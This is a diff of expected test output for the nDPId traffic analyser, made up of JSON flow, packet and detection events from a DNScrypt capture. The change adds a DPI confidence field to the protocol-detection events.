AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mAAub0ROA4KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":179,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mEgAL0REzoKAAABrGhdUKNIBaMGBE6vtDQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mEAub0ROA0KAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":181,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+mJAAL0R9vgKAAABrGhdUJWLBaMCCMyOtDUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAIc+mNAAL0R9vcKAAABrGhdUOhhBaMCCMyOtDcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":183,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":946739306241,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAAXc+mQgAL0REzcKAAABrGhdUN5GBaMGBBOttDgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739306241,"flow_last_seen":946739306241,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739306241,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739306241,"pkt":"REREREREZmZmZmZmCABFAABQ+mQAub0ROAoKAAABrGhdUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":185,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":946739306433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"ts_msec":946739306433,"pkt":"ZmZmZmZmRERERERECABFAAFbc7kAADgRQ2SsaF1QCgAAAQWjwWgBRx3ktDmBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="}
@@ -393,26 +393,26 @@
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":946739306435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":361,"pkt_l4_len":327,"ts_msec":946739306435,"pkt":"ZmZmZmZmRERERERECABFAAFbc7sAADcRRGKsaF1QCgAAAQWjo0gBRzwJtDSBgAABAAIAAAAAATINZG5zY3J5cHQtY2VydAJqcAR0aWFyA2FwcAAAEAABwAwAEAABAAAAAAB9fEROU0MAAgAARetMpee6oZgp6bqFLigcb0SLVmyPyCbHZR6HuGkwY4G1zZ8bDjrU7\/iD1UD40EN1uvlcdqls0BZMl43HwVwZARZAkJHggho4ekmN0Zb884jA2erV10Cju7fjg6Pz8KRbF0CQkeCCGjhfU2UoX1NlKF9UtqjADAAQAAEAAAAAAH18RE5TQwABAACIFa1N+k0s+4iBtwxUZ\/VXDn6QTrqbz7JAjEb6C42munCjxleQqYGFgM5AgV1cY1L\/xiUTddAkkuTfkcOlN9YEFkCQkeCCGjh6SY3RlvzziMDZ6tXXQKO7t+ODo\/PwpFsWQJCR4IIaOF9TZShfU2UoX1S2qA=="}
